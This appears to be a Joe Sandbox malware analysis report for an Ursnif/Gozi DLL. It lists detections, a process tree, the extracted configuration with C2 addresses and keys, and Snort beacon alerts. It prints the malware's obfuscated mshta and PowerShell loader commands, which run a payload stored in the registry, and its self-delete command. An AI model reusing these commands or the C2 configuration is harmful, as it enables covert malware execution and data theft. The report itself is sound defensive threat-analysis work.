Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nhLAwAo49f

Overview

General Information

Sample Name:nhLAwAo49f (renamed file extension from none to dll)
Analysis ID:614013
MD5:117d2886bf0e722b91c0613f337e97da
SHA1:ca858266bb3a6c30bd798bd52ec9ad5f5992c999
SHA256:5460cbecf56cf0527a162da6e9232c055912ae695990c1894a32b08055f45d37
Tags:32dllexeGozi
Infos:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Sigma detected: Accessing WinAPI in PowerShell. Code Injection
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Sigma detected: Suspicious Remote Thread Created
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
One or more processes crash
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Sigma detected: Suspicious Csc.exe Source File Folder
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6740 cmdline: loaddll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 6748 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6768 cmdline: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5304 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 684 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 3616 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\nhLAwAo49f.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 4028 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 3808 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 6232 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • rundll32.exe (PID: 6472 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • WerFault.exe (PID: 6844 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 7020 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 616 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 4992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 652 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • mshta.exe (PID: 5520 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4572 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5316 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFC15.tmp" "c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3108 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3204 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES319C.tmp" "c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8,  *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000000.660579754.0000000000CB0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
    00000002.00000003.709240338.0000000004C19000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
      00000002.00000003.534721654.0000000005248000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.579816746.0000000005248000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000002.00000003.534964580.0000000005248000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.rundll32.exe.4890000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              2.3.rundll32.exe.514a4a0.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                2.3.rundll32.exe.4c194a0.10.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  2.3.rundll32.exe.4c194a0.10.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    2.3.rundll32.exe.51f6940.2.raw.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 2 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Windows Shell File Write to Suspicious Folder
                      Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 5520, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
                      Sigma detected: Accessing WinAPI in PowerShell. Code Injection
                      Source: Threat createdAuthor: Nikita Nazarov, oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6092, StartAddress: 73801580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 684
                      Sigma detected: MSHTA Spawning Windows Shell
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5520, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6092, ProcessName: powershell.exe
                      Sigma detected: Suspicious Call by Ordinal
                      Source: Process startedAuthor: Florian Roth: Data: Command: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6748, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\nhLAwAo49f.dll",#1, ProcessId: 6768, ProcessName: rundll32.exe
                      Sigma detected: Suspicious Remote Thread Created
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 6092, StartAddress: 73801580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 684
                      Sigma detected: Mshta Spawning Windows Shell
                      Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5520, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6092, ProcessName: powershell.exe
                      Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5304, ParentProcessName: control.exe, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6472, ProcessName: rundll32.exe
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6092, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline, ProcessId: 4572, ProcessName: csc.exe
                      Source: Process startedAuthor: frack113: Data: Command: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", CommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 684, ParentProcessName: explorer.exe, ProcessCommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", ProcessId: 6232, ProcessName: cmd.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ftlo='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ftlo).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5520, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 6092, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", CommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 684, ParentProcessName: explorer.exe, ProcessCommandLine: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\F5DD.bi1", ProcessId: 6232, ProcessName: cmd.exe
                      Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6092, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 588, ProcessName: conhost.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6092, TargetFilename: C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132951499937436164.6092.DefaultAppDomain.powershell

                      Snort Signatures

                      Timestamp:04/22/22-18:13:04.407179 04/22/22-18:13:04.407179
                      SID:2033203
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/22/22-18:12:43.292918 04/22/22-18:12:43.292918
                      SID:2033203
                      Source Port:49758
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/22/22-18:13:05.383399 04/22/22-18:13:05.383399
                      SID:2033204
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:04/22/22-18:13:03.616504 04/22/22-18:13:03.616504
                      SID:2033203
                      Source Port:49773
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Found malware configuration
                      Source: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "pL7U8jIQ6Xyci+KwkOGf1cPW2/Fhd+dF//sxc+w06EDUcByHCNEeq3AMzyjoircBRXTmPPIhcdpmz3ebzg0LE5DJtHXLGNdffU4pfKjfVhDmO/39S4DkofaSw/DfVYS7XTULsvD4OgcLpBmdb9KtHDr5tcYukmu8ER2eGMJKWWH3QPIgCCGjluPn4AJBYaVv+PYiV87aKNKmQY2QyHTRdeOeR6t/zjeQ8WAxQr1ckNg8DXeFDVPzLqKlTMh9JNV1/WxJWw/i0NwLqKGVqwwhDZj7TdIN07N7A3Nsw4LKUmopfR2v3CfaFAElEJJF5iXQZdDs3LWMU3fma/lDGlnr41o8sOGT4DKtfI59bD0qne8=", "c2_domain": ["config.edge.skype.com", "67.43.234.14", "config.edge.skype.com", "67.43.234.37", "config.edge.skype.com", "67.43.234.47"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Q8tR9QJN7lLzOLle", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "movie_capture": "30, 8, *terminal* *debug**snif* *shark*", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "999", "SetWaitableTimer_value": "1"}
                      Multi AV Scanner detection for submitted file
                      Source: nhLAwAo49f.dllReversingLabs: Detection: 28%
                      Machine Learning detection for sample
                      Source: nhLAwAo49f.dllJoe Sandbox ML: detected
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_04893072 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,2_2_04893072
                      Source: nhLAwAo49f.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.458226282.0000000000480000.00000002.00000001.01000000.00000003.sdmp, nhLAwAo49f.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.643731503.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.646214990.0000000006210000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.pdb source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.pdbine89 source: powershell.exe, 00000012.00000003.673491356.00000212B82F4000.00000004.00000020.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5591B wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,2_2_00B5591B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B55A14 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,2_2_00B55A14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5FCC0 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,2_2_00B5FCC0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_00B5CE21 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,2_2_00B5CE21

                      Networking

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49758 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 13.107.42.16:80
                      Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49773 -> 146.70.35.138:80
                      Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49773 -> 146.70.35.138:80
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 146.70.35.138 80Jump to behavior
                      Uses ping.exe to check the status of other devices and networks
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
